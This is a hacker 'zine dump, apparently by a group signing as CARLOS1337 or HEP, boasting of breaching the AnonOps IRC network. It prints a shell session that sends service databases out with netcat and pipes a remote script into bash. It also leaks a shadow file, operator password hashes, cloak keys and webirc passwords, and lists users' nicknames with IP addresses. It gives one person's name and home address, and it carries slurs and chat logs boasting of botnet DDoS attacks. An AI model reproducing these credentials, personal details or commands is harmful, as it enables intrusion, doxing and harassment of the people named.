uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
veritas 0.0.7.209
workbench 50.71.143.81
wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
xent 77.247.181.162 chomsky.torservers.net
zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
zxcvsd 95.140.125.37 free-125-37.mediaworksit.net
:: 0x06 ~ l0l sh1t ::
Here's a bit of quotes we found funny.
_ _ _
| | | | (_)
__| | __ _| |__ ___ ___ __ _ _ ___ _ __ ___ __ _ _ __
/ _` |/ _` | '_ \ / _ \ / _ \ / _` | |/ _ \ '_ ` _ \ / _` | '_ \
| (_| | (_| | |_) | (_) | (_) | (_| | | __/ | | | | | (_| | | | |
\__,_|\__,_|_.__/ \___/ \___/ \__, |_|\___|_| |_| |_|\__,_|_| |_|
__/ |
|___/
<daboogieman> now that i'm an oper im no longer accepting PM's from anyone
because i feel that i have too much else to do ( being an oper and all)
<daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
and /kill <nick>
<daboogieman> any attempt by a non-oper to chat to me will be met by instand
gline and/or kill
_
(_)
_ __ _ ___
| '_ \| |/ _ \
| |_) | | __/
| .__/|_|\___|
| |
|_|
<pie>!ban *!*@*
<anon>what the fuck
<pie>its ok i can do whatever i want because im drunk
<pie>it will be fine in the morning
_ _
| | | |
___ __ _| | ___| |__
/ __/ _` | |/ _ \ '_ \
| (_| (_| | | __/ |_) |
\___\__,_|_|\___|_.__/
<Caleb>fuck my vps just got hacked with a ddos attack
<Caleb>morning
<Caleb>hi
<Caleb>:3
<Caleb>have a nice sleep? :3
<Caleb>i had a good sleep
<Caleb>eating my lunch now
<Caleb>ohai
<Caleb>ohai!
<Caleb>ohai :3
<Caleb>my computer seems to be fucking itself at 7000 rpms.
<Caleb> just block the morons
<Caleb>hmmm
<Caleb>lol
<Caleb>sup!
<Caleb>:3
<Caleb>going to sleep for a bit bbl...
<Caleb>How do you hack with a DDOS attack?
<Caleb>my shell just got hit with 77gbps
<Caleb>im gonna destroy them when i find out who did it
<Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed
@CalebNewz: somehow their hitting my ip table.
_____ _____ _ __
/ _ \ \ /\ / / _ \ '_ \
| (_) \ V V / __/ | | |
\___/ \_/\_/ \___|_| |_|
<owen>FUCK this box doesnt have wget we are screwed then
<owen>[redacted] im fucking zlineing you because you're a movement traitor
<owen>you dont even know who i really am and the connections i have
<owen>i can just call in a favor and get your personal life ruined
<owen>is there young boys here (over 18) who wanna have a chat in pm??
<owen>you HAVE to install unreal to ~/Unreal3.2
_ _____ __
/\ | | |__ \ \ / /
/ \ | |__ __ _ ) \ \_/ /
/ /\ \ | '_ \ / _` | / / \ /
/ ____ \| | | | (_| |/ /_ | |
/_/ \_\_| |_|\__,_|____| |_|
<Aha2Y>if your servers getting DDoSed just mitigate the attack
<Aha2Y>i have this awesome script i found on hackforums
<Aha2Y>it blocks ip addresses
<Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
it on my network
<Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
so that means its DDoSing me right?
<Aha2Y>i'll use my script of hackforums to block it
____ ____ _ _ _
| _ \ _____ _____ _ _|___ \ / \ | | |
| |_) / _ \ \ /\ / / _ \ '__|__) | / _ \ | | |
| __/ (_) \ V V / __/ | / __/ / ___ \| | |
|_| \___/ \_/\_/ \___|_| |_____/_/ \_\_|_|
@Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
@Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
is deemed SAFE. I said it was online, not "SAFE", dipshit.
@doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
That just smacks of gross negligence. Turn in your Guy Fawkes mask.
@Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
the provider.
@Power2All: Yes, they honeypotted my IP. Using mobile connection now.
_
_ __ ___ _ __ ___ ___| | ___ ___ _ __
| '__/ _ \ '_ ` _ \/ __| |/ _ \/ _ \ '_ \
| | | __/ | | | | \__ \ | __/ __/ |_) |
|_| \___|_| |_| |_|___/_|\___|\___| .__/
|_|
D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
Names: Rick Bonata
Address 221 FRANKLIN AVE
CUYAHOGA FALLS, OH 44221
<remsleep>i might launch at 666,666
<remsleep>idk yet
<remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
<remsleep>it takes time to send orders to 180,000 zombies :p
<remsleep>the time servers being down complicated the scanrio
<remsleep>scenario
<remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.
<Ian>on average, the typical non-root server is 10mbps
<remsleep>but as far as the world is concerned, i am just a host.
<remsleep>Ian: yes
<remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
<Ian>so you are talking about
<Ian>10,000,000mbps
<remsleep>:)
<Ian>10,000gbps
<remsleep>heuheheuhehehe
<Ian>10 terabits
<remsleep>roughly.
<remsleep>plus or minus
<remsleep>it's take years
<remsleep>and constant evasion of law enforcement
<remsleep>i've got a direct line into NCIC via telnet.
<remsleep>:D :D :D
<remsleep>verified i have gov ip's on mah shit
<remsleep>i am going to block ALL government ips
<remsleep>http://www.uaff.info/militarytracking.htm
<remsleep>fyi
<remsleep>i mean if i was a giant corporate vpn provider and they offered me like
2 mill for some ips, i would give fake ips but i would do it for the $$ lol
<remsleep>not the first time i've falsified logs for money ;p
<remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
DHCP clients, I was getting radio signals beemed at my house :P
<remsleep>@-@
<remsleep>wonder how many warrants become invalid because of that little job :D
<remsleep>chinanet is connected to me
<remsleep>mother fuckers
<remsleep> If the FBI does come, or whomever for whatever reason, I will have
them on camera with a live feed with a 3G modem backup streaming to one of
my VDSs. I would be unstopable after that, I would sue for false arrest,
kidnapping, conspiracy to each, general fuckery as well as a large sum of
punitive damages.
<anon> Hey
<anon> 221 FRANKLIN AVE
<anon> CUYAHOGA FALLS, OH 4422
<anon> Lucky for you, I'm not in your jurisdiction ;)
<remsleep> So you're saying you're a cop?
<remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
Falls Ohio
<remsleep> and my dns whois, falsified as well. :\
<anon> Yeah, ok
<anon> You should probably just /quit
<anon> If you continue to enable terrorist activity, I'll call someone who
DOES have jurisdiction
<remsleep> ..
<remsleep> Really?
<anon> Really.
<remsleep> Dude, call who you wanna call. I could care less.
<anon> Also, seriously?
<anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
[remsleep] Memo to ANY Law Enforcement: You are compelled to
leave this network, failure to do so will result in whatever
evidence obtained being after this point will become sealed
and unusable in court. You are tresspasing, you have been warned.
<anon> HAHAHAHAHA
<anon> I've kicked down the doors of file sharers who had similar
notices attached to their servers
:: 0x07 ~ FiL3z ::
We've enclosed some fun files for your viewing pleasure. These are probably
the best part of this dump.
Filename Description
shadow /etc/shadow, self explanatory
oper.db Anope Oper Database
chan.db Anope Channel Database
nick.db Anope NickServ Database
keys.txt AnonOps private ssl key/cert
defaults.conf InspIRCd Conf.
nick.out.txt Human readable NickServ database w/ cracked passwords,
nickname aliases, registration times, seen times, memos (LOL)
chan.out.txt Huamn readable ChanServ database w/ cracked passwords,
access lists, akick lists, badwords, ..etc.
:: 0x08 ~ exit ::
tl;dr JAJA ANONOPS ESTAN MUERTO. (LOL DEAD)
AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
bring Anonymous back to the state it was, but we've burned the abonimation
that took its place to the ground. For that, we are proud. We hope you enjoyed
reading this little 'zine half as much as we enjoyed owning these
pseudo-activitists for the Nth time. We've personally been responsible for
nulling somewhere in the neighborhood of 50 of their servers, and will just
keep dropping them as they put more back up. Ryan Cleary had the right idea,
in trying to get Anons to spread out, but the namefags didn't want to listen.
This time, we can only hope that they do.
VIVA LA CARLOS1337!!!!!
shoutz 2 kayla, robert cavanaugh, topiary & ryan cleary and zalgo irc trojan
for fighting the good fight.

35830
htp/HTP-4.txt
View file

File diff suppressed because it is too large Load diff

1058
htp/HTP-5.txt
View file

File diff suppressed because it is too large Load diff

817
htp/HTP-Anonops2.txt
View file

@ -1,817 +0,0 @@
888 888 d8888 .d8888b. 888 d8P
888 888 d88888 d88P Y88b 888 d8P
888 888 d88P888 888 888 888 d8P
8888888888 d88P 888 888 888d88K
888 888 d88P 888 888 8888888b
888 888 d88P 888 888 888 888 Y88b
888 888 d8888888888 Y88b d88P 888 Y88b
888 888 d88P 888 "Y8888P" 888 Y88b
_____
8888888888 888 ,-:` \;',`'-
888 888 .'-;_,; ':-;_,'.
888 888 /; '/ , _`.-\
8888888 888 | '`. (` /` ` \`|
888 888 |:. `\`-. \_ / |
888 888 | ( `, .`\ ;'|
888 888 \ | .' `-'/
8888888888 88888888 `. ;/ .'
`'-._____.-'`
8888888b. 888 d8888 888b 888 8888888888 88888888888 d8888
888 Y88b 888 d88888 8888b 888 888 888 d88888
888 888 888 d88P888 88888b 888 888 888 d88P888
888 d88P 888 d88P 888 888Y88b 888 8888888 888 d88P 888
8888888P" 888 d88P 888 888 Y88b888 888 888 d88P 888
888 888 d88P 888 888 Y88888 888 888 d88P 888
888 888 d8888888888 888 Y8888 888 888 d8888888888
888 88888888 d88P 888 888 Y888 8888888888 888 d88P 888
<shitstorm> lol who the fuck is carlos
CARLOS1337
PRESENTE
LOL ANONOPS MUERTO
CERO DIA EDICION
┌─────────────────────────┐
│ :: Table of Contents :: │
├─────────────────────────┤
│ 0x01 ~ Prefac3 │
├─────────────────────────┤
│ 0x02 ~ s3rv1c3s pwn │
├─────────────────────────┤
│ 0x03 ~ iRCd pwn │
├─────────────────────────┤
│ 0x04 ~ b0x pwn │
├─────────────────────────┤
│ 0x05 ~ 1ps │
├─────────────────────────┤
│ 0x06 ~ l0l sh1t │
├─────────────────────────┤
│ 0x07 ~ FiL3z │
├─────────────────────────┤
│ 0x08 ~ ex1t │
└─────────────────────────┘
:: 0x01 - Prefac3 ::
Over the course of the following months, it has become very clear to us that
AnonOps no longer stands for the values of open speech, freedom of opinion and
has instead transformed itself into a network rampent with trolls, abusive
channel operators, and a generally unwelcoming place for those whom wish to
communicate and gather to fight the powers of corruption, and those whom wish
to censor our open internet. Various attempts have been made in the past to
course correct AnonOps, but the totalitarian IRC operator regime has remained
intact.
The AnonOps network prides itself in being "secure", however, such is not
the case. Rather, they employ incompetent and highly unprofessional channel and
IRC operators, allowing their personal grudges to interfere with the operation
of a secure network for Anonymous. Newcomers to the network are welcomed by a
spirit of condescention and arrogance, as any legitimate question or concern is
slowly drowned out by the laughter of the senior members of the chatroom.
Channel operators rather than discourage such behavior, applaud it, joining in,
and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
to speak out against the way the network is ran is met with kick, ban, or zline.
A decentralized organization such as Anonymous cannot thrive on a network ran by
such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
an idea; ideas are bulletproof.
Anonymous cannot be owned or controlled by a small group of faggot
totaltarian operators. Thus we have decided to lombotomize the cancer that is
AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
against us as an agent of censorship, unlulzy pseudo-activism and immense
faggotry, and thus must be eliminated.
AnonOps has proven itself insecure and fault prone in the past. We are here
to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
actions, they have proven themselves against our ideals. Welcome to thecourt of
the internet, AnonOps. You shall be persecuted for your crimes against the
freedom of chats, your utter and repeated failure as an IRC network, your aid to
the spread of namefagging, and your gross negligence in securing the identities
of those whom chat and remain Anonymous on your network.
AnonOps has shown time and time again it is too large of a target, and very
well capable of corrupting the ideals which fuels the fight in every Anon.
As long as AnonOps stay online, they will continue to adulterate our cause,
bastardizing ideals of Anonymous, and running a network where the only lulz to
be had are that of the failures whom chat there and run the network. Such
activity cannot continue.
Let's drop the formalities now, and get down to business!
:: 0x02 - s3rv1c3s pwn ::
¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
After probing AnonOps for quite a while, we figured out that they were using
a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
zero day we were able to get ourselves a reverse shell.
connect to [REDACTED] from 46.182.105.86 38604
[anonops@ns1 ~]$ id
uid=502(anonops) gid=502(anonops) groups=502(anonops)
# Let's go ahead and snag ourselves some juicy files...
[anonops@ns1 ~]$ cd ~/inspircd/run/conf
[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
[anonops@ns1 conf]$ cd ~/services
[anonops@ns1 services]$ nc htp 443 < nick.db
[anonops@ns1 services]$ nc htp 443 < chan.db
[anonops@ns1 services]$ nc htp 443 < oper.db
[anonops@ns1 services]$ nc htp 443 < os_info.db
# And then let's go ahead and hook services.
[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
[anonops@ns1 services]$ killall services; ./services; exit
:: 0x02 - iRCd pwn ::
¡Dios Mios!
<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
<power hash="sha256"
diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
modes="+xiw">
<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
modes="+xiw">
<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+xwi">
<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
<cidr ipv4clone="32" ipv6clone="128">
<channels users="50" opers="100">
<banlist chan="*" limit="128">
<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
invitebypassmodes="no">
<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
quietbursts="yes" nouserdns="no">
<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
restrictbannedusers="yes" genericoper="yes" userstats="">
<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
<badnick nick="ChanServ" reason="Reserved For Services">
<badnick nick="NickServ" reason="Reserved For Services">
<badnick nick="OperServ" reason="Reserved For Services">
<badnick nick="MemoServ" reason="Reserved For Services">
<badnick nick="BotServ" reason="Reserved For Services">
<badnick nick="vHostServ" reason="Reserved For Services">
<badhost host="IRCLOIC@*" reason="wrong server">
<uline server="services.anonops.in" silent="yes">
<uline server="defender.anonops.in" silent="yes">
# Oper Classes
<class name="Root"
commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
GRELOADMODULE CLEARCACHE">
<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
GLOADMODULE GUNLOADMODULE SQUIT"
privs="users/auspex channels/auspex servers/auspex users/mass-message
channels/high-join-limit channels/set-permanent users/flood/no-throttle
users/flood/increased-buffers" usermodes="*" chanmodes="*">
<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
channels/high-join-limit" usermodes="*" chanmodes="*">
<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
chanmodes="*" privs="users/mass-message">
<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
CHECK CHGNAME" usermodes="*" chanmodes="*">
<class name="OperUnlag" privs="users/flood/no-throttle
users/flood/increased-buffers">
<class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
OJOIN FILTER CBAN">
# Oper Types
<type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
<type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
<type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
MODEDEVOICE MODEHALFOP MODEDEHALFOP">
<type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
<type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
ServerLink Shutdown" vhost="servadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
# Oper List
<oper name="power2all" hash="sha256"
password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="Cody" hash="sha256"
password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pi" hash="sha256"
password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
host="*@*" vhost="anonops.staff" type="RootAdmin">
<oper name="p0ke" hash="sha256"
password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="jaychow" hash="sha256"
password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="shitstorm" hash="sha256"
password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
#<oper name="Isis" hash="sha256"
# password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="Nerdo" hash="sha256"
# password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
# host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="evilworks" hash="sha256"
password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="Jupiler" hash="sha256"
password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="sharpie" hash="sha256"
# password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="daboogieman" hash="sha256"
password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pie" hash="sha256"
password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
# Default Modules Configs
<module name="m_md5.so">
<module name="m_sha256.so">
<module name="m_ripemd160.so">
<module name="m_alias.so">
<alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
uline="yes">
<alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
uline="yes">
<alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
uline="yes" operonly="yes">
<alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
uline="yes">
<alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
uline="yes">
<alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
uline="yes">
<alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
<alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
<alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
operonly="yes">
<alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
<alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
<alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
<alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
uline="yes">
<module name="m_allowinvite.so">
<module name="m_alltime.so">
<module name="m_auditorium.so">
<auditorium opvisible="no" opcansee="yes" opercansee="yes">
<module name="m_blockcolor.so">
<module name="m_botmode.so">
<module name="m_callerid.so">
<callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
<module name="m_chancreate.so">
<module name="m_chanprotect.so">
<chanprotect noservices="no" qprefix="~" aprefix="&amp;" deprotectself="yes"
deprotectothers="yes">
<module name="m_check.so">
<module name="m_chghost.so">
<module name="m_chgident.so">
<module name="m_chgname.so">
<module name="m_cloaking.so">
<cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
<module name="m_close.so">
<module name="m_clones.so">
<module name="m_conn_umodes.so">
#<module name="m_connectban.so">
#<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
<module name="m_dccallow.so">
<dccallow blockchat="yes" length="0" action="block">
<banfile pattern="*" action="block">
<module name="m_delayjoin.so">
<module name="m_devoice.so">
<module name="m_dnsbl.so">
<dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
reason="DroneBL" duration="30d" bitmask="253">
<dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
reason="ProxyBL" duration="30d" bitmask="253">
<dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
reason="EFnetRBL" duration="30d" bitmask="253">
<module name="m_filter.so">
<filteropts engine="pcre">
<module name="m_globalload.so">
<module name="m_globops.so">
<module name="m_halfop.so">
<module name="m_hidechans.so">
<hidechans affectsopers="false">
<module name="m_hideoper.so">
<module name="m_inviteexception.so">
<module name="m_joinflood.so">
<module name="m_knock.so">
<module name="m_lockserv.so">
<module name="m_maphide.so">
<module name="m_messageflood.so">
<module name="m_muteban.so">
<module name="m_conn_waitpong.so">
<waitpong sendsnotice="yes" killonbadreply="no">
<module name="m_nickflood.so">
<module name="m_nicklock.so">
<module name="m_nonotice.so">
<module name="m_noctcp.so">
<module name="m_nokicks.so">
<module name="m_nonicks.so">
#Oper modules
<module name="m_operchans.so">
<module name="m_ojoin.so">
<ojoin prefix="" notice="no" op="no">
<module name="m_operjoin.so">
<operjoin channel="#opers" override="no">
<module name="m_opermotd.so">
<opermotd file="oper.motd" onoper="yes">
<module name="m_override.so">
<module name="m_password_hash.so">
<module name="m_redirect.so">
<module name="m_regex_glob.so">
<module name="m_regex_posix.so">
<module name="m_regex_pcre.so">
<module name="m_regonlycreate.so">
<module name="m_rline.so">
<module name="m_sajoin.so">
<module name="m_sakick.so">
<module name="m_samode.so">
<module name="m_sanick.so">
<module name="m_sapart.so">
<module name="m_satopic.so">
<module name="m_securelist.so">
<securehost exception="*@*.searchirc.org">
<securehost exception="*@*.netsplit.de">
<securehost exception="*@bot.search.mibbit.com">
<module name="m_sethost.so">
<module name="m_setident.so">
<module name="m_setname.so">
<module name="m_seenicks.so">
<module name="m_services_account.so">
<module name="m_showwhois.so">
<module name="m_shun.so">
<shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
<module name="m_spanningtree.so">
<module name="m_sslmodes.so">
<module name="m_ssl_gnutls.so">
<module name="m_sslinfo.so">
<module name="m_stripcolor.so">
<module name="m_svshold.so">
<module name="m_swhois.so">
<module name="m_timedbans.so">
<module name="m_tline.so">
#<module name="m_xline_db.so">
#Mibbit Blocks
<module name="m_cgiirc.so">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="64.62.228.82">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="207.192.75.252">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="78.129.202.38">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="109.169.29.95">
# P0ke's WebIRC
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">
:: 0x04 - b0x pwn ::
[anonops@ns1 run]$ base64 utmp
[anonops@ns1 etc]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
shitstorm:x:500:500::/home/shitstorm:/bin/bash
anonops:x:501:501::/home/anonops:/bin/bash
owen:x:502:502::/home/owen:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
# IT GETS BETTER!
[anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::
:: 0x05 ~ 1pS ::
# These were posted on pastebin, but it didnt seem to get as much attention
# as whoever posted it wanted it to get. All these are from a vulnerable
# CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
# What a fucking idiot.
ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
